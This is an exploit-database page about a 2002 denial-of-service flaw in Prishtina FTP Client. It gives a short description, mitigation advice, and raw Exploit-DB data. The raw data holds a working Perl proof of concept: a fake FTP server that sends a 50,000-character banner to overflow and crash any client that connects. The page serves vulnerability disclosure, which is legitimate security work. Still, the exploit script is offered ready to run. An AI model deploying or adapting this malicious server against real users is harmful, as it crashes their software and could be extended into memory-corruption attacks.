header-logo
Suggest Exploit
vendor:
FTP Client
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: FTP Client
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Prishtina FTP Client Denial of Service Vulnerability

Prishtina FTP client is allegedly prone to a denial of service vulnerability. The condition is reportedly triggered when processing FTP server banners of excessive length. As a result, a malicious attacker-controlled server may be used to crash a target users FTP client. The vulnerability is caused by a buffer overflow error when the FTP client processes a server banner of excessive length. A malicious attacker can exploit this vulnerability by sending a specially crafted FTP server banner to the target user.

Mitigation:

Users should avoid connecting to untrusted FTP servers and should consider using a firewall to limit access to the FTP client.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7671/info

Prishtina FTP client is allegedly prone to a denial of service vulnerability. The condition is reportedly triggered when processing FTP server banners of excessive length. As a result, a malicious attacker-controlled server may be used to crash a target users FTP client. 

#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$buf\n";
 close($client);
}

Navigation

Suggest Exploit

Services By CQR